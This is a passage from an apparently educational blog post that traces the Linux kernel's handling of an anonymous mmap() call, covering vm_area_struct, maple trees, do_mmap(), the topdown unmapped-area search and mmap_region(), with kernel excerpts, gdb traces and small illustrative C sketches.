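If you’d rather do this check from code than by eyeballing the output, here’s a minimal sketch that maps a page and then looks for it in /proc/self/maps. The helper names are my own, and it only checks that the range is covered by some rw line rather than expecting a line of its own, since adjacent anonymous mappings can end up sharing a single entry.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mman.h>

/*
 * Returns 1 if [start, start + len) is covered by a single readable and
 * writable line in /proc/self/maps, 0 if not, -1 if procfs can't be read.
 */
static int range_is_mapped_rw(unsigned long start, unsigned long len)
{
	FILE *fp = fopen("/proc/self/maps", "r");
	char line[512];
	int found = 0;

	if (!fp)
		return -1;

	while (fgets(line, sizeof(line), fp)) {
		unsigned long lo, hi;
		char perms[5];

		/* Each line starts with "<start>-<end> <perms>" */
		if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) != 3)
			continue;

		if (lo <= start && start + len <= hi &&
		    perms[0] == 'r' && perms[1] == 'w') {
			found = 1;
			break;
		}
	}

	fclose(fp);
	return found;
}

/* Map one anonymous page, as our example program does, and look it up. */
static int map_and_check(void)
{
	const unsigned long len = 0x1000;
	void *addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
			  MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	int found;

	if (addr == MAP_FAILED)
		return -1;

	found = range_is_mapped_rw((unsigned long)addr, len);
	munmap(addr, len);
	return found;
}
```

Calling map_and_check() from a main() should return 1 on a system with procfs mounted.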

So now we have a general idea of what a mapping is, how exactly does the kernel represent and manage our process’s mappings? Cue [struct vm_area_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664)!

`struct vm_area_struct`

/*
 * This struct describes a virtual memory area. There is one of these
 * per VM-area/task. A VM area is any part of the process virtual memory
 * space that has a special rule for the page-fault handlers (ie a shared
 * library, the executable area etc).
 */
struct vm_area_struct {
	union {
		struct {
			/* VMA covers [vm_start; vm_end) addresses within mm */
			unsigned long vm_start;
			unsigned long vm_end;
		};
#ifdef CONFIG_PER_VMA_LOCK
		struct rcu_head vm_rcu;	/* Used for deferred freeing. */
#endif
	};

	struct mm_struct *vm_mm;	/* The address space we belong to. */
	pgprot_t vm_page_prot;          /* Access permissions of this VMA. */

	union {
		const vm_flags_t vm_flags;
		vm_flags_t __private __vm_flags;
	};

#ifdef CONFIG_PER_VMA_LOCK
	/* Flag to indicate areas detached from the mm->mm_mt tree */
	bool detached;

	int vm_lock_seq;
	struct vma_lock *vm_lock;
#endif

	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space->i_mmap interval tree.
	 *
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;

	/*
	 * A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages.	A MAP_SHARED vma
	 * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_lock &
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifdef CONFIG_ANON_VMA_NAME
	/*
	 * For private and shared anonymous mappings, a pointer to a null
	 * terminated string containing the name given to the vma, or NULL if
	 * unnamed. Serialized by mmap_lock. Use anon_vma_name to access.
	 */
	struct anon_vma_name *anon_name;
#endif
#ifdef CONFIG_SWAP
	atomic_long_t swap_readahead_info;
#endif
#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
#ifdef CONFIG_NUMA_BALANCING
	struct vma_numab_state *numab_state;	/* NUMA Balancing state */
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
} __randomize_layout;

Perhaps understandably, there’s a lot going on here! But this is the structure, referred to as a vma, that describes the virtual memory areas of a process. For example, you can see at the top vm_start and vm_end define the start and end addresses of the vma; just below that, vm_mm holds a reference to the mm the vma belongs to, etc.

We’ll touch more on each field as it becomes relevant, but I just wanted to introduce the structure here rather than trying to wedge it in when it crops up down the line.

`mm->mm_mt`

Okay, so a vma describes a single memory area, but as we saw, even our little program has quite a few memory areas - how are these all managed? Good question!

Each process is responsible for tracking its memory areas, and as we know, each process’s memory is managed by a [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)! So this is where we’ll find our answer:

struct mm_struct {
		// SNIP
		struct maple_tree mm_mt;

include/linux/mm_types.h

Previously, this would have been struct rb_root mm_rb;, but since 6.1 the kernel moved from red-black trees to the [maple_tree](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/maple_tree.h#L219) data structure for vma management.

I’m but a humble researcher, so if you’re interested in diving more into maple tree internals, this LWN article does a great job introducing maple trees (alternatively, head straight to the kernel docs). Suffice it to say it’s a cache-optimised, low memory footprint data structure ideal for storing non-overlapping ranges - perfect for vmas!

The key details to highlight are that:

mm_mt is the tree of vmas belonging to the mm_struct’s process,
A VMA is represented as a node within the tree, but the tree is also able to track gaps between these VMAs (i.e. gaps in the virtual address space)
The maple tree data structure comes with its own normal and advanced API, but there are also a set of wrapper functions specifically for handling vma maple tree usage

`do_mmap()`

/*
 * The caller must write-lock current->mm->mmap_lock.
 */
unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{

mm/mmap.c

Okay, let’s get back to it! For some context, upon entering [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255):

file is NULL as we’re mapping anonymous memory ([MAP_ANONYMOUS](https://elixir.bootlin.com/linux/v6.11.5/source/include/uapi/asm-generic/mman-common.h#L23)), i.e. we’re not mapping a file into our userspace process, but a chunk of “anonymous” physical memory.
vm_flags stores the flags used for the virtual memory mapping we’re creating. In this case, the caller [vm_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575) does not specify any flags.
populate is an unsigned long* initialised by do_mmap() and read by the caller, to determine if the mapping should be “populated” before returning to userspace. We’ll touch more on the significance of that later, just know that a mapping is populated when MAP_POPULATE is set and MAP_NONBLOCK is not (so not our case study).
uf, which relates to [userfaultfd(2)](https://man7.org/linux/man-pages/man2/userfaultfd.2.html), is a linked list initialised by the caller. It’s not touched in do_mmap() and probably out of scope for this series anyway, so we’ll ignore it for now.
addr, len, prot, flags, pgoff all correspond to the same values we passed into mmap(2) from our userspace program.
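As a quick illustration of the populate condition described above (MAP_POPULATE set, MAP_NONBLOCK not set), here’s a small userspace sketch. The function name is hypothetical and this is just the flag test on its own, not the kernel’s code:

```c
#define _GNU_SOURCE
#include <stdbool.h>
#include <sys/mman.h>

/*
 * Mask out everything except the two flags we care about, then require
 * that only MAP_POPULATE is left standing.
 */
static bool wants_populate(unsigned long flags)
{
	return (flags & (MAP_POPULATE | MAP_NONBLOCK)) == MAP_POPULATE;
}
```

For our program’s flags (MAP_ANONYMOUS | MAP_PRIVATE) this is false, which matches the note above that populating isn’t relevant to our case study.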

Okay, so what’s the goal of this function? We know from exploring the previous functions in the call stack that the return value is the value that mmap(2) returns to userspace: on success, the userspace address of the mapping; on error, the MAP_FAILED value ((void *) -1). So where does do_mmap()’s return value come from?

unsigned long do_mmap(struct file *file, unsigned long addr,
			unsigned long len, unsigned long prot,
			unsigned long flags, vm_flags_t vm_flags,
			unsigned long pgoff, unsigned long *populate,
			struct list_head *uf)
{
	// SNIP
	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
	// SNIP
	return addr;
}

mm/mmap.c

Hm, so it looks like the rabbit hole goes deeper! do_mmap()’s job is to process and sanitise its arguments so that they can be passed to mmap_region(), which sets up the actual memory mapping (right??? surely there’s no more calls).

More specifically, do_mmap() has a few responsibilities, including:

Sanitising values and performing any necessary checks, such as preventing overflows or stopping the user exceeding the maximum mapping count defined by [sysctl_max_map_count](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L202).
Calculating the correct vm_flags, which are later applied to the struct vm_area_struct created for this mapping, based off of various factors such as prot, flags, mm->def_flags etc.
Determining what userspace virtual address, stored in addr, is passed to [mmap_region()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849).

Finding A Suitable `addr`

In order to find a suitable addr for our new memory mapping, broadly speaking, there’s two general cases for do_mmap() to consider:

Case A: flags includes MAP_FIXED or MAP_FIXED_NOREPLACE
Case B: flags includes neither MAP_FIXED nor MAP_FIXED_NOREPLACE (our case)

For Case A, the fixed addr specified by the user is passed to mmap_region(). However, the virtual address range spanned by this new mapping (addr to addr + len) might overlap existing ones. The default behaviour is to unmap the overlapped part. If MAP_FIXED_NOREPLACE is set though, do_mmap() will return -EEXIST if the new mapping will end up overlapping any existing ones.

Otherwise, in case B, the kernel will determine the addr. The value of addr passed by the user is actually used as a hint about where to place the mapping. Note the “hint” addr is page aligned and rounded to a minimum value of mmap_min_addr[1] by [round_hint_to_min()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1194) (which will happen in our case, as addr == 0).
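We can poke at the Case A behaviour from userspace. The sketch below maps a page normally and then asks for the exact same address again with MAP_FIXED_NOREPLACE, which should fail with EEXIST on kernels that support the flag (4.17+). The function name is my own, and the fallback #define is only there for older libc headers.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <sys/mman.h>

#ifndef MAP_FIXED_NOREPLACE
#define MAP_FIXED_NOREPLACE 0x100000 /* value from the Linux uapi headers */
#endif

/*
 * Returns the errno from mapping over an existing mapping with
 * MAP_FIXED_NOREPLACE, 0 if the call didn't fail (e.g. an old kernel
 * treating addr as a plain hint), or -1 if the initial mapping failed.
 */
static int noreplace_errno(void)
{
	const size_t len = 0x1000;
	void *first, *second;
	int err = 0;

	first = mmap(NULL, len, PROT_READ | PROT_WRITE,
		     MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	if (first == MAP_FAILED)
		return -1;

	/* Same address, same length: guaranteed to overlap `first`. */
	second = mmap(first, len, PROT_READ | PROT_WRITE,
		      MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE, -1, 0);
	if (second == MAP_FAILED)
		err = errno;
	else if (second != first)
		munmap(second, len); /* flag was ignored, clean up */

	munmap(first, len);
	return err;
}
```

On a recent kernel I’d expect noreplace_errno() to return EEXIST, which is the -EEXIST from do_mmap() surfacing in userspace via errno.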

In either case, [__get_unmapped_area()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1923) is called to determine an appropriate addr:

	/* Obtain the address to map to. we verify (or select) it and ensure
	 * that it represents a valid section of the address space.
	 */
	addr = __get_unmapped_area(file, addr, len, pgoff, flags, vm_flags);
	if (IS_ERR_VALUE(addr))
		return addr;

mm/mmap.c

To avoid getting too lost in the sauce, we’ll skim over this function. Essentially it does some more sanitisation and checks. This includes another LSM hook (mmap_addr) on the addr yielded at the end of this function, as well as an arch specific check (arch_mmap_check()) which is currently only used by arm and sparc.

The approach used to get the unmapped area depends on a few factors:

If it’s a file, some file types may implement their own method to get an area.
If it’s a shared anonymous mapping, rather than directly allocating physical memory it actually uses a special shmem (shared memory) file (maybe we’ll touch on this later)
Finally, if neither case (i.e. MAP_PRIVATE | MAP_ANON), it will use either [thp_get_unmapped_area_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/huge_memory.c#L926) (if CONFIG_TRANSPARENT_HUGEPAGE=y) or [mm_get_unmapped_area_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1911) - this is the case we’re interested in!

Transparent Huge Pages (THPs) are a kernel feature for … you guessed it! Enabling huge pages, transparently! Currently for anonymous memory mappings and tmpfs/shmem.

If we recall our page primer, pages are typically defined as 4KB (0x1000 bytes) chunks of physical memory. A “huge page” here is 2M (0x200000 bytes) in size. So the tl;dr here is that thp_get_unmapped_area_vmflags() will try and align the addr to a 2M boundary so that it can be used as a huge page automatically (AKA transparently!). It’s okay if this doesn’t make total sense yet, as we’ll cover paging in more detail soon!

Either way it will end up using mm_get_unmapped_area_vmflags(), so that’s where we’ll go next! Well, briefly. Because this function will then call into an arch specific function depending on if the MMF_TOPDOWN bit is set in our process’s mm->flags. This determines whether we’ll search from the top or bottom of our address space for an unmapped area.

On x86_64 this is set, which leads us to [arch_get_unmapped_area_topdown_vmflags()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161):

(gdb) bt
#0  arch_get_unmapped_area_topdown_vmflags (filp=0x0 , addr0=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at arch/x86/kernel/sys_x86_64.c:164
#1  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=, filp=filp@entry=0x0 , addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#2  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#3  thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#4  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 , addr=, len=len@entry=4096, 
    pgoff=, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#5  0xffffffff8124725d in do_mmap (file=file@entry=0x0 , addr=, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc9000076bee8, uf=0xffffc9000076bef0)
    at mm/mmap.c:1325
#6  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 , addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#7  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc9000076bf58, nr=) at arch/x86/entry/common.c:52
#8  do_syscall_64 (regs=0xffffc9000076bf58, nr=) at arch/x86/entry/common.c:83
#9  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121

We made it! Okay, let’s dig into how the address is fetched by walking through the function. There are various checks but for brevity I will focus on the addr finding:

unsigned long
arch_get_unmapped_area_topdown_vmflags(struct file *filp, unsigned long addr0,
			  unsigned long len, unsigned long pgoff,
			  unsigned long flags, vm_flags_t vm_flags)
{
	struct vm_area_struct *vma;
	struct mm_struct *mm = current->mm;
	unsigned long addr = addr0;
	struct vm_unmapped_area_info info = {};
    
	// SNIP
    
	if (flags & MAP_FIXED)
		return addr;

arch/x86/kernel/sys_x86_64.c

If MAP_FIXED is set, addr is returned as-is, no questions asked.

	if (addr) {
		addr &= PAGE_MASK;                              [0]
		if (!mmap_address_hint_valid(addr, len))        [1]
			goto get_unmapped_area;

		vma = find_vma(mm, addr);                       [2]
		if (!vma || addr + len <= vm_start_gap(vma))
			return addr;                            [3]
	}

arch/x86/kernel/sys_x86_64.c

If a hint is set (i.e. addr != 0) then the function will check if that address range is free. It does this by first making sure the addr is page aligned [0] and does another validation check on the addr [1]. The comment for [mmap_address_hint_valid()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/mmap.c#L209) does a good job describing why this check is needed!

To check if the address range our new mapping will use is free, it calls [find_vma()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2014) [2] - this function returns the first memory region at or AFTER addr in our mm. If no mapping is returned (!vma) then the address space after addr is free and we’re good to go.

However, if there is a mapping somewhere at or after addr, we need to make sure it starts AFTER the end of our new mapping. It does this by comparing where our new mapping will end (addr + len) and the start address of the vma ([vm_start_gap(vma)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3513); the gap part is because the function factors in any potential padding). If there’s no overlap, our mapping’s area is unmapped and we can use the hint! [3]
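Here’s the hint check boiled down to a toy userspace model. To be clear about the assumptions: the toy_ names are made up, the “tree” is just a sorted array of non-overlapping areas, and I’m comparing against vm_start directly rather than modelling the padding that vm_start_gap() accounts for.

```c
#include <stddef.h>

/* Toy stand-in for a vma: covers [vm_start, vm_end) */
struct toy_vma {
	unsigned long vm_start;
	unsigned long vm_end;
};

/*
 * Mimics find_vma() semantics: return the first area that ends after
 * addr (so it either contains addr or sits above it), or NULL if there
 * is nothing at or after addr. Assumes vmas[] is sorted by address.
 */
static const struct toy_vma *toy_find_vma(const struct toy_vma *vmas,
					  size_t n, unsigned long addr)
{
	for (size_t i = 0; i < n; i++)
		if (addr < vmas[i].vm_end)
			return &vmas[i];
	return NULL;
}

/* The hint is usable if nothing is above it, or the next area starts
 * at or after the end of our new mapping. */
static int toy_hint_is_free(const struct toy_vma *vmas, size_t n,
			    unsigned long addr, unsigned long len)
{
	const struct toy_vma *vma = toy_find_vma(vmas, n, addr);

	return !vma || addr + len <= vma->vm_start;
}
```

Note how a hint that lands inside an existing area fails the same comparison: find_vma() returns the area containing addr, whose start is below addr + len.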

struct vm_unmapped_area_info {
	unsigned long flags;        // informs search behaviour
	unsigned long length;       // length of the mapping in bytes
	unsigned long low_limit;    // lowest vaddr to start at
	unsigned long high_limit;   // highest vaddr to end at
	unsigned long align_mask;   // alignment mask the addr must satisfy
	unsigned long align_offset; // 
	unsigned long start_gap;    // minimum gap required before mapping
};

include/linux/mm.h

If the hint isn’t valid or overlaps an existing mapping, the function will proceed to the get_unmapped_area label which will populate the [struct vm_unmapped_area_info](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443), which describes the properties and constraints of our new mapping.

Remember, as we’re searching topdown, high_limit defines the start point (base) for our search. So how is this calculated? By default, the function will use the value that is handily stored in mm->mmap_base (the base user vaddr for topdown allocations). But what is this?

From these slides by Adrian Huang

Let’s remind ourselves of the x86_64 process virtual address space. We can see that mm->mmap_base sits at the upper end of the address space, just below the stack (and its guard gap). This diagram is the “canonical” address space and assumes a typical 47-bits (out of the 64, on a 64-bit system) are used for the virtual address.

However, more bits may be used for the virtual address on some systems. So while the implementation defaults to mmap_base as the high_limit, if the hint is outside of this window, then the high_limit will instead be set to the true upper bounds of the user virtual address space (where TASK_SIZE_MAX defines the size of the user virtual address space).

	info.high_limit = get_mmap_base(0);
	// SNIP

	/*
	 * If hint address is above DEFAULT_MAP_WINDOW, look for unmapped area
	 * in the full address space.
	 *
	 * !in_32bit_syscall() check to avoid high addresses for x32
	 * (and make it no op on native i386).
	 */
	if (addr > DEFAULT_MAP_WINDOW && !in_32bit_syscall())
		info.high_limit += TASK_SIZE_MAX - DEFAULT_MAP_WINDOW;

arch/x86/kernel/sys_x86_64.c
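To put some numbers on that adjustment, here’s a small worked sketch. The TOY_ constants are my own stand-ins: I’m assuming 4KB pages, a 47-bit default window and a 56-bit user address space (i.e. a system with 5-level paging enabled), and leaving out the in_32bit_syscall() check entirely.

```c
#include <stdint.h>

#define TOY_PAGE_SIZE		0x1000ULL
/* Assumption: default 47-bit user address space window */
#define TOY_DEFAULT_MAP_WINDOW	((1ULL << 47) - TOY_PAGE_SIZE)
/* Assumption: 5-level paging, so 56 bits of user address space */
#define TOY_TASK_SIZE_MAX	((1ULL << 56) - TOY_PAGE_SIZE)

/*
 * Start from mmap_base and only widen the search window if the hint
 * sits above the default window.
 */
static uint64_t toy_high_limit(uint64_t mmap_base, uint64_t hint)
{
	uint64_t high_limit = mmap_base;

	if (hint > TOY_DEFAULT_MAP_WINDOW)
		high_limit += TOY_TASK_SIZE_MAX - TOY_DEFAULT_MAP_WINDOW;

	return high_limit;
}
```

With no hint (our case), the limit is just mmap_base. With a hint above the 47-bit window, the limit is shifted up by the difference between the two address space sizes, so the search can reach the extra space. On a system where both sizes are the same, that difference is zero and nothing changes.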

The info structure is then passed to [vm_unmapped_area(&info)](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1765) which will do the search. As we specify VM_UNMAPPED_AREA_TOPDOWN in flags, it uses the [unmapped_area_topdown(info)](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714) implementation.

Using the magic of gdb, we can set a breakpoint to examine the info structure for our program’s mapping to make sure everything aligns with our understanding:

(gdb) p/x *((struct vm_unmapped_area_info*)info)
$2 = {
  flags = VM_UNMAPPED_AREA_TOPDOWN, 
  length = 0x1000,                  // our mapping len
  low_limit = 0x1000,               // default low_limit
  high_limit = 0x7f4bc62a3000,      // mmap_base (highest bit set is 47)
  align_mask = 0x0, 
  align_offset = 0x0, 
  start_gap = 0x0
}

Now unmapped_area_topdown() has all the information it needs to search the address space from high_limit to low_limit, looking for a gap that fits our mapping of len (taking into account any alignment or gaps required before the mapping):

static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
{
	// SNIP
	VMA_ITERATOR(vmi, current->mm, 0);
		
	// SNIP
    
	if (vma_iter_area_highest(&vmi, low_limit, high_limit, length))
		return -ENOMEM;

	gap = vma_iter_end(&vmi) - info->length;
	gap -= (gap - info->align_offset) & info->align_mask;
	gap_end = vma_iter_end(&vmi);

mm/mmap.c

Remember those maple trees we spoke about at the beginning? Well now it’s all going to come in handy! [VMA_ITERATOR()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L1114) is a macro used to initialise an iterator, vmi, for iterating (!) the vmas of a process (our current->mm in this case).

The main logic is then handled by the handy [vma_iter_area_highest()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1411). This function wraps the advanced maple tree API, mas_empty_area_rev(), to find the first gap (i.e. a range not spanned by a node/vma) of length bytes, working from high_limit down to low_limit. And just like that we’ve done our topdown search!

There are then some additional checks to make sure it conforms with the supplied info plus some additional error cases but that’s the general gist of it. We did it! That’s how we find an unused virtual address for our mapping … at least for the default topdown case on an x86_64 system …
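If it helps to see the shape of the search, here’s a toy version of a topdown gap search. This is not how the maple tree does it internally (it doesn’t walk every area like this), it ignores alignment and start_gap, and all the names are hypothetical; it’s just the same idea over a sorted array of non-overlapping ranges.

```c
#include <stddef.h>

/* Toy stand-in for a mapped area: covers [start, end) */
struct toy_range {
	unsigned long start;
	unsigned long end;
};

/*
 * Walk the areas from highest to lowest and return the start address of
 * the highest gap of at least len bytes inside [low, high), placing the
 * mapping at the top of that gap. Returns 0 if no gap fits.
 */
static unsigned long toy_topdown_search(const struct toy_range *vmas, size_t n,
					unsigned long low, unsigned long high,
					unsigned long len)
{
	unsigned long gap_end = high;

	for (size_t i = n; i-- > 0; ) {
		unsigned long gap_start;

		/* Area is entirely above our current window, skip it */
		if (vmas[i].start >= gap_end)
			continue;

		/* The gap runs from the end of this area up to gap_end */
		gap_start = vmas[i].end > low ? vmas[i].end : low;
		if (gap_start < gap_end && gap_end - gap_start >= len)
			return gap_end - len;

		/* No luck, continue the search below this area */
		gap_end = vmas[i].start;
		if (gap_end <= low)
			return 0;
	}

	/* Nothing (else) mapped below gap_end: check the final gap */
	if (gap_end > low && gap_end - low >= len)
		return gap_end - len;

	return 0;
}
```

This also lines up with what we saw in the maps output earlier, where our anonymous page ended up directly below the existing mapping at the top of the mmap region.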

For context, this is where we are in the callstack at this point:

#0  0xffffffff81243e86 in unmapped_area_topdown (info=) at mm/mmap.c:1719
#1  vm_unmapped_area (info=info@entry=0xffffc900004b7d80) at mm/mmap.c:1770
#2  0xffffffff81037ce5 in arch_get_unmapped_area_topdown_vmflags (filp=0x0 , addr0=0, len=4096, pgoff=0, flags=34, 
    vm_flags=) at arch/x86/kernel/sys_x86_64.c:219
#3  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=, filp=filp@entry=0x0 , addr=addr@entry=0, 
    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
#4  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:937
#5  thp_get_unmapped_area_vmflags (filp=0x0 , addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
    at mm/huge_memory.c:926
#6  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 , addr=, len=len@entry=4096, 
    pgoff=, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
#7  0xffffffff8124725d in do_mmap (file=file@entry=0x0 , addr=, addr@entry=0, len=len@entry=4096, 
    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc900004b7ee8, uf=0xffffc900004b7ef0)
    at mm/mmap.c:1325
#8  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 , addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#9  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900004b7f58, nr=) at arch/x86/entry/common.c:52
#10 do_syscall_64 (regs=0xffffc900004b7f58, nr=) at arch/x86/entry/common.c:83

We’re going to head back up to do_mmap() and cover the final bit of logic for the mapping process: mmap_region().

`mmap_region()`

	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);

mm/mmap.c

Okay! Can you believe we’re still on the first system call of our “simple” program?! There’s not long left now though! We’re back in do_mmap() and the pieces are set:

file is NULL as we’re mapping anonymous memory, not a file, in our address space
addr, as we’ve just painstakingly discovered, now contains a suitable virtual address for our mapping
len is the length of our mapping in bytes
vm_flags has been populated in do_mmap() from a combination of the prot and flags we passed to mmap() as well as the mm->def_flags
pgoff is zero, right? hah, well … for anonymous MAP_PRIVATE mappings, do_mmap() will set pgoff = addr >> PAGE_SHIFT;. But pgoff is for file offsets, and we’re not mapping a file?! The tl;dr here is this acts as an identifier for anonymous vmas (I’m sure we’ll touch on this later).
uf, the userfault list stuff, is still untouched and probably still out of scope for the post
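As a sanity check on the vm_flags point, we can decode the vm_flags=115 value from the earlier gdb backtraces. The sketch below uses my own TOY_ copies of the low VM_* bit values, and only those; treat it as a decoding aid rather than kernel code.

```c
#include <stddef.h>
#include <stdio.h>

/* Local copies of the low VM_* bits, prefixed to avoid any confusion
 * with the real kernel definitions. */
#define TOY_VM_READ	0x01UL
#define TOY_VM_WRITE	0x02UL
#define TOY_VM_EXEC	0x04UL
#define TOY_VM_SHARED	0x08UL
#define TOY_VM_MAYREAD	0x10UL
#define TOY_VM_MAYWRITE	0x20UL
#define TOY_VM_MAYEXEC	0x40UL
#define TOY_VM_MAYSHARE	0x80UL

static const struct {
	unsigned long bit;
	const char *name;
} toy_vm_flag_names[] = {
	{ TOY_VM_READ, "VM_READ" },	  { TOY_VM_WRITE, "VM_WRITE" },
	{ TOY_VM_EXEC, "VM_EXEC" },	  { TOY_VM_SHARED, "VM_SHARED" },
	{ TOY_VM_MAYREAD, "VM_MAYREAD" }, { TOY_VM_MAYWRITE, "VM_MAYWRITE" },
	{ TOY_VM_MAYEXEC, "VM_MAYEXEC" }, { TOY_VM_MAYSHARE, "VM_MAYSHARE" },
};

/* Writes the set flags into buf as "A|B|C" and returns buf.
 * Bits outside the table above are ignored. */
static const char *toy_decode_vm_flags(unsigned long vm_flags,
				       char *buf, size_t size)
{
	size_t count = sizeof(toy_vm_flag_names) / sizeof(toy_vm_flag_names[0]);
	size_t used = 0;

	if (size == 0)
		return buf;
	buf[0] = '\0';

	for (size_t i = 0; i < count; i++) {
		int n;

		if (!(vm_flags & toy_vm_flag_names[i].bit))
			continue;

		n = snprintf(buf + used, size - used, "%s%s",
			     used ? "|" : "", toy_vm_flag_names[i].name);
		if (n < 0 || (size_t)n >= size - used)
			break; /* out of space, stop here */
		used += (size_t)n;
	}

	return buf;
}
```

115 is 0x73, which decodes to VM_READ|VM_WRITE|VM_MAYREAD|VM_MAYWRITE|VM_MAYEXEC: the read/write bits come from our PROT_READ | PROT_WRITE, alongside the VM_MAY* bits describing what the mapping may later be changed to.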

Now we’re ready to jump into mmap_region()! The goal of this function is to do the actual “mapping” part of mmap(), which essentially means making sure our mapping (len bytes at addr with vm_flags properties) is represented by a struct vm_area_struct and stored in the mm->mm_mt. Sounds simple enough, right?

Well … as you might expect, there are a lot of cases, edge cases and validation that needs to be done to do this correctly. For now we’ll continue to focus on those relating specifically to anonymous mappings and our case study.

unsigned long mmap_region(struct file *file, unsigned long addr,
		unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
		struct list_head *uf)
{
	struct mm_struct *mm = current->mm;
	struct vm_area_struct *vma = NULL;
	struct vm_area_struct *next, *prev, *merge;
// SNIP
	VMA_ITERATOR(vmi, mm, addr);

mm/mmap.c

Right off the bat we can see the VMA_ITERATOR() macro again, which will be doing a lot of heavy lifting in this function for navigating the mm->mm_mt maple tree. Note that it’s initialised with our addr, so the iterator will be initialised with addr as its index.

	/* Check against address space limit. */
	if (!may_expand_vm(mm, vm_flags, len >> PAGE_SHIFT)) {
		unsigned long nr_pages;
		// SNIP     
	}

	/* Unmap any existing mapping in the area */
	error = do_vmi_munmap(&vmi, mm, addr, len, uf, false);
	// SNIP

mm/mmap.c

Next we do some housekeeping. First is a check to make sure “the calling process may expand its vm space by the passed number of pages” (len >> PAGE_SHIFT is a quick way to convert len bytes to the page count equivalent). This involves checking against any resource limits.

Then, we hit a quirk of MAP_FIXED behaviour we touched on earlier. Notably, when looking for an unmapped area, by default we’ll get an addr that does not overlap any existing mappings for len bytes. However, if MAP_FIXED is passed, it will just use the addr passed by the user (as long as it’s valid), regardless of overlaps.

